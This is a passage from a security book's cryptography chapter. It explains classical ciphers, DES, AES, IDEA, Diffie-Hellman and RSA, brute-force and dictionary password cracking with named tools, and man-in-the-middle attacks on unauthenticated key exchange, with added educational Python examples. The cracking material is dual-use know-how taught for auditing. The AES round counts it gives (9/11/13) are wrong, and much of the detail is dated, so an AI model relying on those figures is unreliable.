NOPQRSTUVWXYZABCDEFGHIJKLM
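The two-row table above is all a Caesar-style shift needs. As an added example (not from the book), the following Python builds that table for any rotation, encodes and decodes with it, and shows why a 25-key cipher offers no secrecy: every key can be tried in a single loop.

```python
import string

ALPHABET = string.ascii_uppercase  # the first row of the table: A..Z


def shift_alphabet(shift: int) -> str:
    """Second row of the table: the alphabet rotated by `shift` positions."""
    shift %= len(ALPHABET)
    return ALPHABET[shift:] + ALPHABET[:shift]


def caesar(text: str, shift: int) -> str:
    """Map each letter of `text` from the first row to the second row.

    shift=3 is Caesar's Cipher (S -> V, E -> H); shift=13 is ROT13.
    Case is preserved; digits, spaces and punctuation pass through untouched.
    A negative shift decrypts.
    """
    second_row = shift_alphabet(shift)
    table = str.maketrans(ALPHABET + ALPHABET.lower(),
                          second_row + second_row.lower())
    return text.translate(table)


def rot13(text: str) -> str:
    """ROT13 is its own inverse: 13 + 13 = 26 brings every letter home."""
    return caesar(text, 13)


def try_every_shift(ciphertext: str) -> dict:
    """All 26 candidate plaintexts for a shifted ciphertext.

    The keyspace is only the 25 non-trivial rotations, so exhaustive search
    (the brute force discussed later in the chapter) finishes instantly;
    this is why ROT13 hides spoilers but never secrets.
    """
    return {shift: caesar(ciphertext, -shift) for shift in range(26)}


if __name__ == "__main__":
    print(shift_alphabet(13))               # NOPQRSTUVWXYZABCDEFGHIJKLM
    print(caesar("SE", 3))                  # VH
    print(rot13("V guvax Jvaqbjf fhpxf"))   # decodes the page's example
```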
Encryption Key Types
Cryptography uses two types of keys: symmetric and asymmetric. Symmetric keys
have been around the longest; they utilize a single key for both the encryption
and decryption of the ciphertext. This type of key is called a secret key, because
you must keep it secret. Otherwise, anyone in possession of the key can decrypt
messages that have been encrypted with it. The algorithms used in symmetric key
encryption have, for the most part, been around for many years and are well
known, so the only thing that is secret is the key being used. Indeed, all of the
really useful algorithms in use today are completely open to the public.
A couple of problems immediately come to mind when you are using symmetric
key encryption as the sole means of cryptography. First, how do you
ensure that the sender and receiver each have the same key? Usually this requires
the use of a courier service or some other trusted means of key transport.
Second, a problem exists if the recipient does not have the same key to decrypt
the ciphertext from the sender. For example, take a situation where the symmetric
key for a piece of crypto hardware is changed at 0400 every morning at
both ends of a circuit. What happens if one end forgets to change the key
(whether it is done with a strip tape, patch blocks, or some other method) at the
appropriate time and sends ciphertext using the old key to another site that has
properly changed to the new key? The end receiving the transmission will not be
able to decrypt the ciphertext, since it is using the wrong key. This can create
major problems in a time of crisis, especially if the old key has been destroyed.
This is an overly simple example, but it should provide a good idea of what can
go wrong if the sender and receiver do not use the same secret key.
Asymmetric cryptography is relatively new in the history of cryptography,
and it is probably more recognizable to you under the synonymous term public
key cryptography. Asymmetric algorithms use two different keys, one for encryption
and one for decryption—a public key and a private key, respectively. Whitfield
Diffie and Martin Hellman first publicly released public key cryptography in
1976 as a method of exchanging keys in a secret key system. Their algorithm,
called the Diffie-Hellman (DH) algorithm, is examined later in the chapter. Even
though it is commonly reported that public key cryptography was first invented
by the duo, some reports state that the British Secret Service actually invented it
a few years prior to the release by Diffie and Hellman. It is alleged, however, that
the British Secret Service never actually did anything with their algorithm after
they developed it. More information on the subject can be found at the following
location: www.wired.com/wired/archive/7.04/crypto_pr.html

Tools & Traps… :)

Assessing Algorithmic Strength
Algorithmic security can only be proven by its resistance to attack. Since
many more attacks are attempted on algorithms which are open to the
public, the longer an algorithm has been open to the public, the more
attempts to circumvent or break it have occurred. Weak algorithms are
broken rather quickly, usually in a matter of days or months, whereas
stronger algorithms may be used for decades. However, the openness of
the algorithm is an important factor. It’s much more difficult to break an
algorithm (whether weak or strong) when its complexities are completely
unknown. Thus when you use an open algorithm, you can rest
assured in its strength. This is opposed to a proprietary algorithm,
which, if weak, may eventually be broken even if the algorithm itself is
not completely understood by the cryptographer. Obviously, one should
limit the trust placed in proprietary algorithms to limit long-term liability.
Such scrutiny is the reason the inner details of many of the
patented algorithms in use today (such as RC6 from RSA Laboratories)
are publicly available.

Some time after Diffie and Hellman, Phil Zimmermann made public key
encryption popular when he released Pretty Good Privacy (PGP) v1.0 for DOS
in August 1991. Support for multiple platforms including UNIX and Amiga was
added in 1994 with the v2.3 release. Over time, PGP has been enhanced and
released by multiple entities, including ViaCrypt and PGP Inc., which is now part
of Network Associates. Both commercial versions and free versions (for noncommercial
use) are available. For those readers in the United States and Canada,
you can retrieve the free version from http://web.mit.edu/network/pgp.html.
The commercial version can be purchased from Network Associates at
www.pgp.com.

Learning about Standard Cryptographic Algorithms

Just why are there so many algorithms anyway? Why doesn’t the world just standardize
on one algorithm? Given the large number of algorithms found in the
field today, these are valid questions with no simple answers. At the most basic
level, it’s a classic case of tradeoffs between security, speed, and ease of implementation.
Here security indicates the likelihood of an algorithm to stand up to current
and future attacks, speed refers to the processing power and time required to
encrypt and decrypt a message, and ease of implementation refers to an algorithm’s
predisposition (if any) to hardware or software usage. Each algorithm has different
strengths and drawbacks, and none of them is ideal in every way. In this chapter,
we will look at the five most common algorithms that you will encounter: Data
Encryption Standard (DES), AES [Rijndael], International Data Encryption
Algorithm (IDEA), Diffie-Hellman, and Rivest, Shamir, Adleman (RSA). Be
aware, though, that there are dozens more active in the field.

Understanding Symmetric Algorithms
In this section, we will examine several of the most common symmetric algorithms
in use: DES, its successor AES, and the European standard, IDEA. Keep in
mind that the strength of symmetric algorithms lies primarily in the size of the
keys used in the algorithm, as well as the number of cycles each algorithm
employs. All symmetric algorithms are also theoretically vulnerable to brute force
attacks, which are exhaustive searches of all possible keys. However, brute force
attacks are often infeasible. We will discuss them in detail later in the chapter.
DES
Among the oldest and most famous encryption algorithms is the Data Encryption
Standard, which was developed by IBM and was the U.S. government standard
from 1976 until about 2001. DES was based significantly on the Lucifer algorithm
invented by Horst Feistel, which never saw widespread use. Essentially, DES uses a
single 64-bit key—56 bits of data and 8 bits of parity—and operates on data in
64-bit chunks. This key is broken into 16 separate 48-bit subkeys, one for each
round, which are called Feistel cycles. Figure 6.1 gives a schematic of how the DES
encryption algorithm operates.
Each round consists of a substitution phase, wherein the data is substituted
with pieces of the key, and a permutation phase, wherein the substituted data is
scrambled (re-ordered). Substitution operations, sometimes referred to as confusion
operations, are said to occur within S-boxes. Similarly, permutation operations,
sometimes called diffusion operations, are said to occur in P-boxes. Both of
these operations occur in the “F Module” of the diagram. The security of DES
lies mainly in the fact that the substitution operations are non-linear, so the
resulting ciphertext in no way resembles the original message. Thus, language-based
analysis techniques (discussed later in this chapter) used against the ciphertext
reveal nothing. The permutation operations add another layer of security by
scrambling the already partially encrypted message.
Every five years from 1976 until 2001, the National Institute of Standards and
Technology (NIST) reaffirmed DES as the encryption standard for the U.S. government.
However, by the 1990s the aging algorithm had begun to show signs
that it was nearing its end of life. New techniques that identified a shortcut
method of attacking the DES cipher, such as differential cryptanalysis, were proposed
as early as 1990, though it was still computationally infeasible to do so.

SECURITY ALERT

How can symmetric algorithms such as DES be made more secure?
Theoretically, there are two ways: either the key length needs to be
increased, or the number of rounds in the encryption process needs to
be increased. Both of these solutions tend to increase the processing
power required to encrypt and decrypt data and slow down the encryption/
decryption speed because of the increased number of mathematical
operations required. Examples of modified DES include 3-DES (a.k.a.
Triple DES) and DESX. Triple DES uses three separate 56-bit DES keys as a
single 168-bit key, though sometimes keys 1 and 3 are identical, yielding
112-bit security. DESX adds an additional 64-bits of key data. Both 3-DES
and DESX are intended to strengthen DES against brute force attacks.

Figure 6.1 Diagram of the DES Encryption Algorithm (figure not reproduced). The diagram shows the incoming cleartext stream entering as a 56-bit data input plus an 8-bit parity input, a preliminary permutation, N iterations in which the 64-bit block is XORed with the output of the F Module driven by 48-bit subkey KN, and a final permutation producing the 56-bit data output and the outgoing ciphertext stream.
172 Chapter 6 • Cryptography
Significant design flaws such as the short 56-bit key length also affected the
longevity of the DES cipher. Shorter keys are more vulnerable to brute force
attacks. Although Whitfield Diffie and Martin Hellman were the first to criticize
this short key length, even going so far as to declare in 1979 that DES would
be useless within 10 years, DES was not publicly broken by a brute force attack
until 1997.
The first successful brute force attack against DES took a large network of
machines over 4 months to accomplish. Less than a year later, in 1998, the
Electronic Frontier Foundation (EFF) cracked DES in less than three days using a
computer specially designed for cracking DES. This computer, code-named
“Deep Crack,” cost less than $250,000 to design and build. The record for
cracking DES stands at just over 22 hours and is held by Distributed.net, which
employed a massively parallel network of thousands of systems (including Deep
Crack). Add to this the fact that Bruce Schneier has theorized that a machine
capable of breaking DES in about six minutes could be built for a mere $10 million.
Clearly, NIST needed to phase out DES in favor of a new algorithm.
AES (Rijndael)
In 1997, as the fall of DES loomed ominously closer, NIST announced the search
for the Advanced Encryption Standard, the successor to DES. Once the search
began, most of the big-name cryptography players submitted their own AES candidates.
Among the requirements of AES candidates were:
• AES would be a private key symmetric block cipher (similar to DES).
• AES needed to be stronger and faster than 3-DES.
• AES required a life expectancy of at least 20-30 years.
• AES would support key sizes of 128-bits, 192-bits, and 256-bits.
• AES would be available to all—royalty free, non-proprietary and
unpatented.
Within months NIST had a total of 15 different entries, 6 of which were
rejected almost immediately on grounds that they were considered incomplete.
By 1999, NIST had narrowed the candidates down to five finalists including
MARS, RC6, Rijndael, Serpent, and Twofish.
Selecting the winner took approximately another year, as each of the candidates
needed to be tested to determine how well they performed in a variety of
environments. After all, applications of AES would range anywhere from portable
smart cards to standard 32-bit desktop computers to high-end optimized 64-bit
computers. Since all of the finalists were highly secure, the primary deciding factors
were speed and ease of implementation (which in this case meant memory
footprint).
Rijndael was ultimately announced as the winner in October of 2000
because of its high performance in both hardware and software implementations
and its small memory requirement.The Rijndael algorithm, developed by Belgian
cryptographers Dr. Joan Daemen and Dr.Vincent Rijmen, also seems resistant to
power- and timing-based attacks.
So how does AES/Rijndael work? Instead of using Feistel cycles in each
round like DES, it uses iterative rounds like IDEA (discussed in the next section).
Data is operated on in 128-bit chunks, which are grouped into four groups of
four bytes each. The number of rounds is also dependent on the key size, such
that 128-bit keys have 9 rounds, 192-bit keys have 11 rounds and 256-bit keys
require 13 rounds. Each round consists of a substitution step of one S-box per
data bit followed by a pseudo-permutation step in which bits are shuffled
between groups. Then each group is multiplied out in a matrix fashion and the
results are added to the subkey for that round.
How much faster is AES than 3-DES? It’s difficult to say, because implementation
speed varies widely depending on what type of processor is performing the
encryption and whether or not the encryption is being performed in software or
running on hardware specifically designed for encryption. However, in similar
implementations, AES is always faster than its 3-DES counterpart. One test performed
by Brian Gladman has shown that on a Pentium Pro 200 with optimized
code written in C, AES (Rijndael) can encrypt and decrypt at an average speed
of 70.2 Mbps, versus DES’s speed of only 28 Mbps. You can read his other results
at fp.gladman.plus.com/cryptography_technology/aes.
IDEA
The European counterpart to the DES algorithm is the IDEA algorithm, and its
existence proves that Americans certainly don’t have a monopoly on strong cryptography.
IDEA was first proposed under the name Proposed Encryption Standard
(PES) in 1990 by cryptographers James Massey and Xuejia Lai as part of a combined
research project between Ascom and the Swiss Federal Institute of
Technology. Before it saw widespread use PES was updated in 1991 to increase its
strength against differential cryptanalysis attacks and was renamed Improved PES
(IPES). Finally, the name was changed to International Data Encryption
Algorithm (IDEA) in 1992.

Not only is IDEA newer than DES, but IDEA is also considerably faster and
more secure. IDEA’s enhanced speed is due to the fact that each round consists of
much simpler operations than the Feistel cycle in DES. These operations (XOR,
addition, and multiplication) are much simpler to implement in software than the
substitution and permutation operations of DES.
IDEA operates on 64-bit blocks with a 128-bit key, and the encryption/
decryption process uses 8 rounds with 6 16-bit subkeys per round. The IDEA
algorithm is patented both in the US and in Europe, but free non-commercial
use is permitted.
Understanding Asymmetric Algorithms
Recall that unlike symmetric algorithms, asymmetric algorithms require more
than one key, usually a public key and a private key (systems with more than two
keys are possible). Instead of relying on the techniques of substitution and transposition,
which symmetric key cryptography uses, asymmetric algorithms rely on
the use of massively large integer mathematics problems. Many of these problems
are simple to do in one direction but difficult to do in the opposite direction. For
example, it’s easy to multiply two numbers together, but it’s more difficult to
factor them back into the original numbers, especially if the integers you are
using contain hundreds of digits. Thus, in general, the security of asymmetric
algorithms is dependent not upon the feasibility of brute force attacks, but the
feasibility of performing difficult mathematical inverse operations and advances in
mathematical theory that may propose new “shortcut” techniques. In this section,
we’ll take a look at RSA and Diffie-Hellman, the two most popular asymmetric
algorithms in use today.
Diffie-Hellman
In 1976, after voicing their disapproval of DES and the difficulty in handling
secret keys, Whitfield Diffie and Martin Hellman published the Diffie-Hellman
algorithm for key exchange. This was the first published use of public key cryptography,
and arguably one of the cryptography field’s greatest advances ever.
Because of the inherent slowness of asymmetric cryptography, the Diffie-Hellman
algorithm was not intended for use as a general encryption scheme—rather, its
purpose was to transmit a private key for DES (or some similar symmetric algorithm)
across an insecure medium. In most cases, Diffie-Hellman is not used for
encrypting a complete message because it is 10 to 1000 times slower than DES,
depending on implementation.

Prior to publication of the Diffie-Hellman algorithm, it was quite painful to
share encrypted information with others because of the inherent key storage and
transmission problems (as discussed later in this chapter). Most wire transmissions
were insecure, since a message could travel between dozens of systems before
reaching the intended recipient and any number of snoops along the way could
uncover the key. With the Diffie-Hellman algorithm, the DES secret key (sent
along with a DES-encrypted payload message) could be encrypted via Diffie-Hellman
by one party and decrypted only by the intended recipient.
In practice, this is how a key exchange using Diffie-Hellman works:
• The two parties agree on two numbers; one is a large prime number, the
other is an integer smaller than the prime. They can do this in the open
and it doesn’t affect security.
• Each of the two parties separately generates another number, which they
keep secret. This number is equivalent to a private key. A calculation is
made involving the private key and the previous two public numbers.
The result is sent to the other party. This result is effectively a public key.
• The two parties exchange their public keys. They then privately perform
a calculation involving their own private key and the other party’s public
key. The resulting number is the session key. Each party will arrive at the
same number.
• The session key can be used as a secret key for another cipher, such as
DES. No third party monitoring the exchange can arrive at the same
session key without knowing one of the private keys.
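The four steps above, carried through in Python as an added example (not from the book). The prime p = 23 and base g = 5 are toy values chosen so the arithmetic can be checked by hand; real exchanges use primes of 2048 bits or more, and deriving the symmetric key by hashing the agreed number is this example's choice, not a step the chapter specifies.

```python
import hashlib
import secrets
from typing import Optional

# Step 1: public parameters. Toy values for readability; in practice p is a
# 2048-bit (or larger) prime and g generates a large subgroup mod p.
P = 23
G = 5


def generate_private_key(p: int = P) -> int:
    """Step 2: each party picks a random secret exponent in [2, p-2]."""
    return 2 + secrets.randbelow(p - 3)


def public_key(private: int, p: int = P, g: int = G) -> int:
    """Step 2 (continued): g^private mod p. This value is sent in the clear."""
    return pow(g, private, p)


def shared_secret(other_public: int, private: int, p: int = P) -> int:
    """Step 3: other_public^private mod p.

    Alice computes B^a = (g^b)^a and Bob computes A^b = (g^a)^b; both equal
    g^(ab) mod p, so the two sides agree without ever sending their secrets.
    """
    return pow(other_public, private, p)


def session_key(other_public: int, private: int, p: int = P, length: int = 8) -> bytes:
    """Step 4: turn the agreed integer into a key for a symmetric cipher.

    Hashing the shared number down to `length` bytes (8 = a DES-sized key)
    is an assumption of this example, not something the chapter prescribes.
    """
    s = shared_secret(other_public, private, p)
    width = (p.bit_length() + 7) // 8
    return hashlib.sha256(s.to_bytes(width, "big")).digest()[:length]


def run_exchange(a: int, b: int, p: int = P, g: int = G) -> dict:
    """Both sides of one exchange. Everything under 'on_the_wire' is what an
    eavesdropper sees; 'alice_key' and 'bob_key' never leave their owners."""
    A = public_key(a, p, g)  # Alice -> Bob
    B = public_key(b, p, g)  # Bob -> Alice
    return {
        "on_the_wire": {"p": p, "g": g, "A": A, "B": B},
        "alice_key": session_key(B, a, p),
        "bob_key": session_key(A, b, p),
    }


def discrete_log_by_exhaustion(target: int, p: int = P, g: int = G) -> Optional[int]:
    """The eavesdropper's generic option: find x with g^x = target (mod p) by
    trying every exponent. Instant for p = 23; at 2048 bits the loop would
    need on the order of 2**2048 steps, which is what makes step 3 safe."""
    for x in range(p):
        if pow(g, x, p) == target:
            return x
    return None


if __name__ == "__main__":
    result = run_exchange(a=6, b=15)
    print(result["on_the_wire"])                      # {'p': 23, 'g': 5, 'A': 8, 'B': 19}
    print(result["alice_key"] == result["bob_key"])   # True
    print(discrete_log_by_exhaustion(result["on_the_wire"]["A"]))  # 6
```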
The most difficult part of the Diffie-Hellman key exchange to understand is
that there are actually two separate and independent encryption cycles happening.
As far as Diffie-Hellman is concerned, only a small message is being
transferred between the sender and the recipient. It just so happens that this small
message is the secret key needed to unlock the larger message.
Diffie-Hellman’s greatest strength is that anyone can know either or both of
the sender and recipient’s public keys without compromising the security of the
message. Both the public and private keys are actually just very large integers. The
Diffie-Hellman algorithm takes advantage of complex mathematical functions
known as discrete logarithms, which are easy to perform forwards but extremely
difficult to find inverses for. Even though the patent on Diffie-Hellman has been
expired for several years now, the algorithm is still in wide use, most notably in
the IPSec protocol. IPSec uses the Diffie-Hellman algorithm in conjunction with
RSA authentication to exchange a session key that is used for encrypting all
traffic that crosses the IPSec tunnel.
RSA
In the year following the Diffie-Hellman proposal, Ron Rivest, Adi Shamir, and
Leonard Adleman proposed another public key encryption system. Their proposal
is now known as the RSA algorithm, named for the last initials of the
researchers. RSA shares many similarities with the Diffie-Hellman algorithm in
that RSA is also based on multiplying and factoring large integers. However,
RSA is significantly faster than Diffie-Hellman, leading to a split in the asymmetric
cryptography field that refers to Diffie-Hellman and similar algorithms as
Public Key Distribution Systems (PKDS) and RSA and similar algorithms as
Public Key Encryption (PKE). PKDS systems are used as session-key exchange
mechanisms, while PKE systems are generally considered fast enough to encrypt
reasonably small messages. However, PKE systems like RSA are not considered
fast enough to encrypt large amounts of data like entire filesystems or high-speed
communications lines.
NOTE
RSA, Diffie-Hellman and other asymmetric algorithms use much larger
keys than their symmetric counterparts. Common key sizes include 1024-
bits and 2048-bits, and the keys need to be this large because factoring,
while still a difficult operation, is much easier to perform than the
exhaustive key search approach used with symmetric algorithms. The relative
slowness of public key encryption systems is also due in part to
these larger key sizes. Since most computers can only handle 32-bits of
precision, different “tricks” are required to emulate the 1024-bit and
2048-bit integers. However, the additional processing time is somewhat
justified, since for security purposes 2048-bit keys are considered to be
secure “forever”—barring any exponential breakthroughs in mathematical
factoring algorithms, of course.
Because of the former patent restrictions on RSA, the algorithm saw only
limited deployment, primarily only from products by RSA Security, until the
mid-1990s. Now you are likely to encounter many programs making extensive
use of RSA, such as PGP and Secure Shell (SSH). The RSA algorithm has been
in the public domain since RSA Security placed it there two weeks before the
patent expired in September 2000. Thus the RSA algorithm is now freely available
for use by anyone, for any purpose.
Understanding Brute Force
Just how secure are encrypted files and passwords anyway? Consider that there
are two ways to break an encryption algorithm—brute force and various cryptanalysis
shortcuts. Cryptanalysis shortcuts vary from algorithm to algorithm, or
may even be non-existent for some algorithms, and they are always difficult to
find and exploit. Conversely, brute force is always available and easy to try. Brute
force techniques involve exhaustively searching the given keyspace by trying
every possible key or password combination until the right one is found.
Brute Force Basics
As an example, consider the basic three-digit combination bicycle lock where
each digit is turned to select a number between zero and nine. Given enough
time and assuming that the combination doesn’t change during the attempts, just
rolling through every possible combination in sequence can easily open this lock.
The total number of possible combinations (keys) is 10^3 or 1000, and let’s say the
frequency, or number of combinations a thief can attempt during a time period,
is 30 per minute. Thus, the thief should be able to open the bike lock in a maximum
of 1000/(30 per min) or about 33 minutes. Keep in mind that with each
new combination attempted, the number of remaining possible combinations
(keyspace) decreases and the chance of guessing the correct combination (deciphering
the key) on the next attempt increases.
Brute force always works because the keyspace, no matter how large, is always
finite. So the way to resist brute force attacks is to choose a keysize large enough
that it becomes too time-consuming for the attacker to use brute force techniques.
In the bike lock example, three digits of keyspace gives the attacker a
maximum amount of time of 33 minutes required to steal the bicycle, so the thief
may be tempted to try a brute force attack. Suppose a bike lock with a five-digit
combination is used. Now there are 100,000 possible combinations, which would
take about 55.5 hours for the thief to check by brute force. Clearly, most thieves
would move on and look for something easier to steal.
When applied to symmetric algorithms such as DES, brute force techniques
work very similarly to the bike lock example. In fact, this happens to be exactly
the way DES was broken by the EFF’s “Deep Crack.” Since the DES key is
known to be 56 bits long, every possible combination of keys between a string of
56 zeros and a string of 56 ones is tested until the appropriate key is discovered.
As for the distributed attempts to break DES, the five-digit bike lock analogy
needs to be slightly changed. Distributed brute force attempts are analogous to
having multiple thieves, each with an exact replica of the bike lock. Each of these
replicas has the exact same combination as the original bike lock, and the thieves
work on the combination in parallel. Suppose there are 50 thieves working
together to guess the combination. Each thief tries a different set of 2,000 combinations
such that no two thieves are working on the same combination set (subkeyspace).
Now instead of testing 30 combinations per minute, the thieves are
testing 1500 combinations per minute, and all possible combinations will be
checked in about 67 minutes. Recall that it took the single thief 55 hours to steal
the bike, but now 50 thieves working together can steal the bike in just over an
hour. Distributed computing applications working under the same fundamentals
are what allowed Distributed.net to crack DES in less than 24 hours.
Applying brute force techniques to RSA and other public key encryption
systems is not quite as simple. Since the RSA algorithm is broken by factoring, if
the keys being used are sufficiently small (far, far smaller than any program using
RSA would allow), it is conceivable that a person could crack the RSA algorithm
using pencil and paper. However, for larger keys, the time required to perform
the factoring becomes excessive. Factoring does not lend itself to
distributed attacks as well, either. A distributed factoring attack would require
much more coordination between participants than simple exhaustive keyspace
coordination. There are projects, such as the www-factoring project
(www.npac.syr.edu/factoring.html), that endeavor to do just this. Currently, the
www-factoring project is attempting to factor a 130-digit number. In comparison,
512-bit keys are about 155 digits in size.
Using Brute Force to Obtain Passwords
Brute force is a method commonly used to obtain passwords, especially if the
encrypted password list is available. While the exact number of characters in a
password is usually unknown, most passwords can be estimated to be between 4
and 16 characters. Since only about 100 different values can be used for each
character of the password, there are only about 100^4 to 100^16 likely password
combinations. Though massively large, the number of possible password combinations
is finite and is therefore vulnerable to brute force attack.

Before specific methods for applying brute force can be discussed, a brief
explanation of password encryption is required. Most modern operating systems
use some form of password hashing to mask the exact password. Because passwords
are never stored on the server in cleartext form, the password authentication
system becomes much more secure. Even if someone unauthorized
somehow obtains the password list, he will not be able to make immediate use of
it, hopefully giving system administrators time to change all of the relevant passwords
before any real damage is caused.
Passwords are generally stored in what is called hashed format. When a password
is entered on the system it passes through a one-way hashing function, such as
Message Digest 5 (MD5), and the output is recorded. Hashing functions are one-way
encryption only, and once data has been hashed, it cannot be restored. A
server doesn’t need to know what your password is. It needs to know that you
know what it is. When you attempt to authenticate, the password you provided is
passed through the hashing function and the output is compared to the stored
hash value. If these values match, then you are authenticated. Otherwise, the login
attempt fails, and is (hopefully) logged by the system.
Brute force attempts to discover passwords usually involve stealing a copy of
the username and hashed password listing and then methodically encrypting possible
passwords using the same hashing function. If a match is found, then the
password is considered cracked. Some variations of brute force techniques involve
simply passing possible passwords directly to the system via remote login
attempts. However, these variations are rarely seen anymore due to account
lockout features and the fact that they can be easily spotted and traced by system
administrators. They also tend to be extremely slow.
Appropriate password selection minimizes—but cannot completely eliminate—
a password’s ability to be cracked. Simple passwords, such as any individual word
in a language, make the weakest passwords because they can be cracked with an
elementary dictionary attack. In this type of attack, long lists of words of a particular
language called dictionary files are searched for a match to the encrypted password.
More complex passwords that include letters, numbers and symbols require
a different brute force technique that includes all printable characters and generally
takes an order of magnitude longer to run.
Some of the more common tools used to perform brute force password
attacks include L0phtcrack for Windows passwords, and Crack and John the
Ripper for UNIX passwords. Not only do hackers use these tools but security
professionals also find them useful in auditing passwords. If it takes a security professional
N days to crack a password, then that is approximately how long it will
take an attacker to do the same. Each of these tools will be discussed briefly, but
be aware that written permission should always be obtained from the system
administrator before using these programs against a system.
L0phtcrack
L0phtCrack is a Windows NT password-auditing tool from the L0pht that came
onto the scene in 1997. It provides several different mechanisms for retrieving the
passwords from the hashes, but is used primarily for its brute force capabilities.
The character sets chosen dictate the amount of time and processing power necessary
to search the entire keyspace. Obviously, the larger the character set
chosen, the longer it will take to complete the attack. However, dictionary-based
attacks, which use only common words against the password database, are normally
quite fast and often effective in catching the poorest passwords. Table 6.1
lists the time required for L0phtcrack 2.5 to crack passwords based on the character
set selected.
Table 6.1 L0phtcrack 2.5 Brute Force Crack Time Using a Quad Xeon 400 MHz Processor

Test: Brute Force Crack, Machine: Quad Xeon 400 MHz

| Character Set              | Time      |
|----------------------------|-----------|
| Alpha-Numeric              | 5.5 Hours |
| Alpha-Numeric-Some Symbols | 45 Hours  |
| Alpha-Numeric-All Symbols  | 480 Hours |

Used with permission of the L0pht
L0pht Heavy Industries, the developers of L0phtcrack, have since sold the
rights to the software to @stake Security. Since the sale, @stake has released a
program called LC3, which is intended to be L0phtcrack’s successor. LC3
includes major improvements over L0phtcrack 2.5, such as distributed cracking
and a simplified sniffing attachment that allows password hashes to be sniffed over
Ethernet. Additionally, LC3 includes a password-cracking wizard to help the less
knowledgeable audit their system passwords. Figure 6.2 shows LC3 displaying the
output of a dictionary attack against some sample user passwords.
LC3 reflects a number of usability advances since the older L0phtcrack 2.5
program, and the redesigned user interface is certainly one of them. Both
L0phtCrack and LC3 are commercial software packages. However, a 15-day trial
can be obtained at www.atstake.com/research/lc3/download.html.

Crack

The oldest and most widely used UNIX password cracking utility is simply called
Crack. Alec Muffett is the author of Crack, which he calls a password-guessing
program for UNIX systems. It runs only on UNIX systems against UNIX passwords,
and is for the most part a dictionary-based program. However, in the latest
release available (v5.0a from 1996), Alec has bundled Crack7, a brute force password
cracker that can be used if a dictionary-based attack fails. One of the most
interesting aspects of this combination is that Crack can test for common variants
that people use when they think they are picking more secure passwords. For
example, instead of “password,” someone may choose “pa55word.” Crack has
user-configurable permutation rules that will catch these variants. More information
on Alec Muffett and Crack is available at www.users.dircon.co.uk/~crypto.

Figure 6.2 Output of a Simple Dictionary-Based Attack

John the Ripper

John the Ripper is another password-cracking program, but it differs from Crack
in that it is available in UNIX, DOS, and Win32 editions. Crack is great for older
systems using crypt(), but John the Ripper is better for newer systems using MD5
and similar password formats. John the Ripper is used primarily for UNIX passwords,
but there are add-ons available to break other types of passwords, such as
Windows NT LanManager (LANMAN) hashes and Netscape Lightweight
Directory Access Protocol (LDAP) server passwords. John the Ripper supports
brute force attacks in incremental mode. Because of John the Ripper’s architecture,
one of its most useful features is its ability to save its status automatically during
the cracking process, which allows for aborted cracking attempts to be restarted
even on a different system. John the Ripper is part of the OpenWall project and
is available from www.openwall.com/john.
A sample screenshot of John the Ripper is shown in Figure 6.3. In this
example, a sample section of a password file in OpenBSD format is cracked using
John the Ripper. Shown below the password file snippet is the actual output of
John the Ripper as it runs. You can see that each cracked password is displayed on
the console. Be aware that the time shown to crack all four passwords is barely over
a minute only because I placed the actual passwords at the top of the “password.lst”
listing, which John uses as its dictionary. Real attempts to crack passwords would
take much longer. After John has cracked a password file, you can have John display
the password file in unshadowed format using the show option.

Knowing When Real Algorithms Are Being Used Improperly
While theoretically, given enough time, almost any encryption standard can be
cracked with brute force, it certainly isn’t the most desirable method to use when
“theoretically enough time” is longer than the age of the universe. Thus, any
shortcut method that a hacker can use to break your encryption will be much
more desirable to him than brute force methods.
None of the encryption algorithms discussed in this chapter have any serious
flaws associated with the algorithms themselves, but sometimes the way the algorithm
is implemented can create vulnerabilities. Shortcut methods for breaking
encryption usually result from a vendor’s faulty implementation of a strong
encryption algorithm, or lousy configuration from the user. In this section, we’ll
discuss several incidents of improperly used encryption that are likely to be
encountered in the field.
Bad Key Exchanges
Because there isn’t any authentication built into the Diffie-Hellman algorithm,
implementations that use Diffie-Hellman-type key exchanges without some sort
of authentication are vulnerable to man-in-the-middle (MITM) attacks. The most
notable example of this type of behavior is the SSH-1 protocol. Since the protocol
itself does not authenticate the client or the server, it’s possible for someone
to cleverly eavesdrop on the communications. This deficiency was one of the
main reasons that the SSH-2 protocol was completely redeveloped from SSH-1.
The SSH-2 protocol authenticates both the client and the server, and warns of or
prevents any possible MITM attacks, depending on configuration, so long as the
client and server have communicated at least once. However, even SSH-2 is vulnerable
to MITM attacks prior to the first key exchange between the client and
the server.
As an example of a MITM-type attack, consider that someone called Al is
performing a standard Diffie-Hellman key exchange with Charlie for the very
first time, while Beth is in a position such that all traffic between Al and Charlie
passes through her network segment. Assuming Beth doesn’t interfere with the
key exchange, she will not be able to read any of the messages passed between Al
and Charlie, because she will be unable to decrypt them. However, suppose that
Beth intercepts the transmissions of Al and Charlie’s public keys and she responds
to them using her own public key. Al will think that Beth’s public key is actually
Charlie’s public key and Charlie will think that Beth’s public key is actually Al’s
public key.
When Al transmits a message to Charlie, he will encrypt it using Beth’s public
key. Beth will intercept the message and decrypt it using her private key. Once
Beth has read the message, she encrypts it again using Charlie’s public key and
transmits the message on to Charlie. She may even modify the message contents
if she so desires. Charlie then receives Beth’s modified message, believing it to
come from Al. He replies to Al and encrypts the message using Beth’s public key.
Beth again intercepts the message, decrypts it with her private key, and modifies
it. Then she encrypts the new message with Al’s public key and sends it on to Al,
who receives it and believes it to be from Charlie.
Clearly, this type of communication is undesirable because a third party not
only has access to confidential information, but she can also modify it at will. In
this type of attack, no encryption is broken because Beth does not know either
Al or Charlie’s private keys, so the Diffie-Hellman algorithm isn’t really at fault.
Beware of the key exchange mechanism used by any public key encryption
system. If the key exchange protocol does not authenticate at least one and
preferably both sides of the connection, it may be vulnerable to MITM-type
attacks. Authentication systems generally use some form of digital certificates
(usually X.509), such as those available from Thawte or VeriSign.
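The Al, Beth and Charlie exchange above, carried through in Python as an added example that is not part of the book: a toy Diffie-Hellman run with and without Beth in the middle, then the same run with each public value authenticated so her substitution is rejected. The small group, the party names and the shared long-term secret (standing in for the certificate-based signature the text mentions) are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

# Toy Diffie-Hellman group (constructed for the example; far too small for real use).
P = 2_147_483_647   # 2**31 - 1, a prime
G = 7               # a primitive root modulo P


def dh_keypair():
    """Return (private, public) for one party: private a, public g^a mod p."""
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def dh_shared(priv, peer_pub):
    """Turn the shared secret (peer_pub^priv mod p) into a symmetric key."""
    secret = pow(peer_pub, priv, P)
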